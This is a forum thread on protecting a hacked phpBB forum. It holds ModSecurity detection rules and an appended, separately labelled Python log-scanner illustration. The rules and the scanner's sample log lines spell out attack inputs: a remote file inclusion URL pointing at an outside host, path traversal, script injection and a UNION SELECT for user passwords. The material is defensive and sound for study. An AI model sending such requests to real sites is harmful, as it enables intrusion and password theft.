Prevent Forum from Hacking

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Ankushforyou
Forum Newbie
Posts: 2
Joined: Sat Sep 02, 2006 11:37 pm

Post by Ankushforyou »

Hello,

Nowadays my forum has been hacked twice or thrice.

I need to know how to protect my phpBB forum from hacking. What precautions should I take?

Thanks in Advance for your Help...!


AnkuShforyou...!
matthijs
DevNet Master
Posts: 3360
Joined: Thu Oct 06, 2005 3:57 pm

Post by matthijs »

Have you updated to the latest version? Have you changed your passwords? Are there other scripts on the same server which might be vulnerable (and therefore a place where hackers can get in)?
hanji
Forum Commoner
Posts: 46
Joined: Fri Apr 29, 2005 3:23 pm

Post by hanji »

matthijs wrote: Have you updated to the latest version? Have you changed your passwords? Are there other scripts on the same server which might be vulnerable (and therefore a place where hackers can get in)?
As matthijs said, updating the code would be a wise move. Do you have control of the server you're on? Meaning, can you adjust Apache settings or install software? If so, you may want to look at mod_security to help stop the script attacks. Another server-based solution is implementing Snort and SnortSam to block at the firewall level based on signatures.

ModSecurity
http://www.modsecurity.org/

Here is a set of modsec rules for phpbb from gotroot (http://www.gotroot.com/tiki-index.php?page=mod_security+rules)

# WEB-PHP phpbb quick-reply.php arbitrary command attempt
SecFilterSelective REQUEST_URI "/quick-reply\.php" chain
SecFilter "phpbb_root_path="


#phpbb
SecFilterSelective REQUEST_URI "admin/admin_styles\.php\?mode=addnew\&install_to=\.\./\.\./"

#phpbb XSS
SecFilterSelective REQUEST_URI "/posting\.php\?mode=reply&t=.*userid.*phpbb2mysql_t=(\<(script|javascript|about|applet|activex|chrome)|(http|https|ftp)\:/)"


#phpbb XSS
SecFilterSelective THE_REQUEST "/admin/admin_forums\.php\?sid=.*" chain
SecFilter "(forumname|forumdesc)=*\<[[:space:]]*(script|about|applet|activex|chrome)"


SecFilterSelective REQUEST_URI "/poc_loginform\.php\?phpbb_root_path=(http|https|ftp)\:/"
SecFilterSelective REQUEST_URI "/poc\.php\?phpbb_root_path=(http|https|ftp)\:/"


#phpbb 2.0.13 download vuln
SecFilterSelective REQUEST_URI "/downloads\.php\?cat=.*(UNION|SELECT|delete|insert)*user_password.*phpbb_users"


#phpbb p[lus
SecFilterSelective REQUEST_URI "/groupcp\.php\?g=.*sid=\'"
SecFilterSelective REQUEST_URI "/index\.php\?(c|mark)=*\'"
SecFilterSelective REQUEST_URI "/portal\.php\?article=*\'"
SecFilterSelective REQUEST_URI "/viewforum.php?f=.*sid=\'"
SecFilterSelective REQUEST_URI "/viewtopic.php?p=.*sid=\'"
SecFilterSelective REQUEST_URI "/album_search\.php\?mode=\'"
SecFilterSelective REQUEST_URI "/album_cat\.php\?cat_id=.*sid=\'"
SecFilterSelective REQUEST_URI "/album_comment\.php\?pic_id=.*sid=\'"
SecFilterSelective REQUEST_URI "calendar_scheduler\.php\?d=.*&mode=&start=\'">"


#General [url] php forum protections (phpbb and others, to protect against script injection attacks in url links)
SecFilterSelective THE_REQUEST "\.php\?" chain
SecFilter "\[url=(script|javascript|applet|about|chrome|activex)\:/.*\].*\[/url\]"


#phpbb wormsign
SecFilterSelective THE_REQUEST "echo _GHC/RST_"


#phpbb xss, sql injection and PHP code injection
SecFilterSelective REQUEST_URI "usercp_register\.php" chain
SecFilterSelective ARG_error_msg "<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>"
SecFilterSelective REQUEST_URI "login\.php" chain
SecFilterSelective ARG_forward_page "<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>"
SecFilterSelective REQUEST_URI "search\.php" chain
SecFilterSelective ARG_list_cat "<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>"
SecFilterSelective REQUEST_URI "usercp_register\.php" chain
SecFilterSelective ARG_signature_bbcode_uid "((select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]|\'|UNION.*SELECT.*INTO.*FROM)"
SecFilterSelective ARG_signature_bbcode_uid "(<.*php|<php)"


#phpBB foing Module "phpbb_root_path" File Inclusion
SecFilterSelective  REQUEST_URI "(index|faq|song|list|gen_m3u|playlist)\.php" "chain,id:390053,rev:1,severity:2,msg:'JITP: phpBB foing Module phpbb_root_path File Inclusion'"
SecFilterSelective ARG_phpbb_root_path "((ht|f)tps?:/|\.\./\.\.)"


#General phpbb_root_path vulnerabilities
SecFilterSelective ARG_phpbb_root_path "((ht|f)tps?\:/|\.\./)"  "id:390070,rev:1,severity:2,msg:'JITP: Generic phpbb_root_path exploit'"
Hope this helps. Also, some hosts (e.g. www.dreamhost.com, among others) offer mod_security as a feature with their hosting.

hanji
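As an added illustration (not part of hanji's post, and not gotroot's or ModSecurity's own code), the following Python script shows what a handful of the rules above actually look for when they are applied to web server access logs. It re-implements a subset of the posted signatures (phpbb_root_path remote/traversal values, the admin_styles install_to traversal, the login.php and usercp_register.php XSS checks, and the downloads.php query check) as Python regular expressions, applies them to URL-decoded request arguments the way ModSecurity does, and reports which constructed log lines fire which rule. The log format, IP addresses, paths and rule names are all constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache common/combined log prefix: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Value patterns taken from the posted rule set, written as Python regexes.
XSS_TAG = re.compile(r"<\s*(script|about|applet|activex|chrome)", re.I)
REMOTE_OR_TRAVERSAL = re.compile(r"((ht|f)tps?:/|\.\./)", re.I)

# (rule name, regex on the decoded URL path, argument name, regex on the decoded
# argument value; None means "fire if the argument is present at all").
RULES = [
    ("phpbb_root_path file inclusion", re.compile(r"\.php$"),
     "phpbb_root_path", REMOTE_OR_TRAVERSAL),
    ("quick-reply phpbb_root_path", re.compile(r"/quick-reply\.php$"),
     "phpbb_root_path", None),
    ("admin_styles traversal", re.compile(r"/admin/admin_styles\.php$"),
     "install_to", re.compile(r"\.\./\.\./")),
    ("usercp_register XSS", re.compile(r"/usercp_register\.php$"),
     "error_msg", XSS_TAG),
    ("login forward_page XSS", re.compile(r"/login\.php$"),
     "forward_page", XSS_TAG),
    ("downloads.php SQLi", re.compile(r"/downloads\.php$"),
     "cat", re.compile(r"(union|select|delete|insert).*user_password.*phpbb_users", re.I | re.S)),
]


def parse_line(line):
    """Parse one access log line; return None for lines that are not in the expected format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = unquote(parts.path)
    # parse_qsl percent-decodes keys and values (and turns '+' into spaces), so the
    # rules below see the same decoded text the application would see.
    rec["args"] = dict(parse_qsl(parts.query, keep_blank_values=True))
    return rec


def match_rules(rec):
    """Return the names of every rule the parsed request triggers, in RULES order."""
    hits = []
    for name, path_re, arg, value_re in RULES:
        if not path_re.search(rec["path"]):
            continue
        if arg not in rec["args"]:
            continue
        if value_re is None or value_re.search(rec["args"][arg]):
            hits.append(name)
    return hits


def scan(lines):
    """Scan log lines; return (line number, client ip, rule name) for each hit."""
    findings = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line: skip, a real tool would count these
        for name in match_rules(rec):
            findings.append((n, rec["ip"], name))
    return findings


# Constructed sample log lines (documentation-range IPs, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Sep/2006:23:37:01 +0000] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [02/Sep/2006:23:37:02 +0000] "GET /forum/index.php?phpbb_root_path=http://198.51.100.7/x.txt HTTP/1.1" 200 310',
    # Percent-encoded traversal: the raw line never contains "../", only the decoded value does.
    '203.0.113.9 - - [02/Sep/2006:23:37:03 +0000] "GET /forum/quick-reply.php?phpbb_root_path=%2e%2e%2f%2e%2e%2f HTTP/1.1" 200 310',
    '203.0.113.12 - - [02/Sep/2006:23:37:04 +0000] "GET /forum/login.php?forward_page=%3Cscript%3E HTTP/1.1" 200 2048',
    '203.0.113.12 - - [02/Sep/2006:23:37:05 +0000] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../ HTTP/1.1" 403 221',
    'not a log line',
    '203.0.113.20 - - [02/Sep/2006:23:37:06 +0000] "GET /forum/downloads.php?cat=1%20UNION%20SELECT%20user_password%20FROM%20phpbb_users HTTP/1.1" 200 777',
]

if __name__ == "__main__":
    for n, ip, name in scan(SAMPLE_LOG):
        print(f"line {n}: {ip} -> {name}")
```

Two things worth noticing when reading the original rules against this script. First, matching must happen on the decoded argument value: the third sample line only contains `%2e%2e%2f`, and a filter that looked at the raw request line would miss it, which is why ModSecurity applies argument filters after decoding. Second, the posted downloads.php rule has `(UNION|SELECT|delete|insert)*` with a trailing `*`, which makes the keyword group optional, so that rule really fires on any `cat` value containing `user_password` followed by `phpbb_users`; the script above uses the stricter `.*` form. Note also that `SecFilter`/`SecFilterSelective` are ModSecurity 1.x directives; ModSecurity 2.x and later replaced them with `SecRule`, so these rules need translating before they will load on a current install.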
RobertGonzalez
Site Administrator
Posts: 14293
Joined: Tue Sep 09, 2003 6:04 pm
Location: Fremont, CA, USA

Post by RobertGonzalez »

The most important thing is to make sure that you are running the most recent version of phpBB and the most recent versions of all the other software that is residing on your server.
Ollie Saunders
DevNet Master
Posts: 3179
Joined: Tue May 24, 2005 6:01 pm
Location: UK

Post by Ollie Saunders »

How was the hack achieved?